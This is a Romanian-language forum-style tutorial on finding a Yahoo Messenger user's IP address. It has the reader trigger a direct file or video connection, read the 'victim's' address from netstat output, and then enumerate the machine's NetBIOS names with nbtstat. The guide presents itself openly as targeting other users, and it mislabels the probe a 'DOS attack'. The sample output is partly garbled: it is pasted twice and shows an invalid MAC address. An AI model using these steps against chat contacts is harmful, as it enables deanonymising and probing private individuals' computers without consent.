Acestea sunt Caracteristicile :
1) Cand vorbim pe yahoo totul trece printr-un server.Cand vorbim pe yahoo este doar mesaj.
2) Cand trmitem fisiere yahoo are 2 optiuni ---->
(a)Unul uploadeaza fisierul si celalalt client trebuie sa il descarce.
(b)Unul se conecteaza direct la client si ia fisierul.
3)Cand folosim video sau audio ---->
(a)Unun trece printr-un server.
(b)Sau are conexiune client la client.
Si cand are conexiune client la client celalalt IP se dezvaluie.In portul 5051.Si cum exploatam userii yahoo cand au coneziune directa.Amintesteti ca sunt aici ca sa "hackuim" un sistem fara a utiliza vre-un program sau vreo unealta , doar cu niste comenzi de net simple.
Hai sa analizam ...
1) Este imposibil sa aflii IP-ul Atacatorului cand doar "chatuiti".
2) Sun 50% sanse de a afla IP-ul cand trimiteti fisiere.
3) Inca odata 50% sanse de a afla IP-ul cand utilizezi video sau audio.
Si dece sa asteptam hai sa exploatam cele 50% din sanse. O sa le exploatez cu video si audio.
1) Dute in DOS
scrie--> netstat -n 3
va va aparea cam asa ceva --->
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
2) Incearca sa trimiti un fisier tintei(victimei).
Daca fisierul trece prin server nu veti primi IP-ul.Doar daca e prin conexiune directa
5101 este portul unde atacatorul este conectat.
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
TCP 194.30.209.15:5101(ACESTA) 194.30.209.14:3290 ESTABLISHED
Urmatorul pas
3)Fa un atac DOS acum
Dute in DOS Prompt si scrie
nbtstat -A Ip-ul victimei . Poate daca sistemul nu este securizat poti vedea intreaga retea.
C:\>nbtstat -A 194.30.209.14
Local Area Connection:
Node IpAddress: [194.30.209.15] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
EDP12 <00> UNIQUE Registered
SHIV <00> GROUP Registered
SHIV <20> UNIQUE Registered
SHIVCOMP1 <1E> GROUP Registered
MAC Address = 00-C0-W0-D5-EF-9A